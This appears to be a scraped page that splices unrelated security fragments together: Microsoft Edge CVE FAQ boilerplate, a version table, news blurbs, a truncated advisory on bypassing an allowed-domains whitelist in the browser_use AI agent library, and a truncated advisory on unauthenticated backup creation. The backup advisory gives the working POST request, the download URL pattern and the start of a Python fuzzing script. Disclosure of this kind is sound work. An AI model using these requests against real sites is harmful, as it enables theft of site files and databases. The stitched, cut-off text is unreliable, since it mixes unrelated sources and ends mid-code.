Tag
#chrome
**Why is this Chrome CVE included in the Security Update Guide?**

The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.

**How can I see the version of the browser?**

1. In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window
2. Click on **Help and Feedback**
3. Click on **About Microsoft Edge**
### Summary

During a manual source code review, [**ARIMLABS.AI**](https://arimlabs.ai) researchers identified that the `browser_use` module includes an embedded whitelist functionality to restrict URLs that can be visited. This restriction is enforced during agent initialization. However, it was discovered that these measures can be bypassed, leading to severe security implications.

### Details

**File:** `browser_use/browser/context.py`

The `BrowserContextConfig` class defines an `allowed_domains` list, which is intended to limit accessible domains. This list is checked in the `_is_url_allowed()` method before navigation:

```python
@dataclass
class BrowserContextConfig:
    """
    [STRIPPED]
    """
    cookies_file: str | None = None
    minimum_wait_page_load_time: float = 0.5
    wait_for_network_idle_page_load_time: float = 1
    maximum_wait_page_load_time: float = 5
    wait_between_actions: float = 1
    disable_security: bool = True
    browser_window_size: Browse...
```
Passwords are becoming things of the past. Passkeys are more secure, easier to manage, and speed up the login process.
**What is the version information for this release?**

| Microsoft Edge Version | Date Released | Based on Chromium Version |
|---|---|---|
| 136.0.3240.50 | 5/1/2025 | 136.0.7103.49 |
Cybercriminals are having less success targeting end-user technology with zero-day attacks, said Google's security team this week.
User interface (UI) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.
### Summary

The request to commence a site backup can be performed without authentication, and the resulting backups can also be downloaded without authentication. The archives are created with a predictable filename, so a malicious user could create an archive and then download it without being authenticated.

### Details

Create an installation using the instructions found in the docker folder of the repository, set up the site, and then send the request to create an archive, which does not require authentication:

```
POST /?api/archives HTTP/1.1
Host: localhost:8085

action=startArchive&params%5Bsavefiles%5D=true&params%5Bsavedatabase%5D=true&callAsync=true
```

Then, to retrieve it, make a simple `GET` request to the correct URL:

```
http://localhost:8085/?api/archives/2025-04-12T14-34-01_archive.zip
```

A malicious attacker could simply fuzz this filename.

### PoC

Here is a Python script to fuzz this:

```
#!/usr/bin/env python3
import requests
import argpars...
```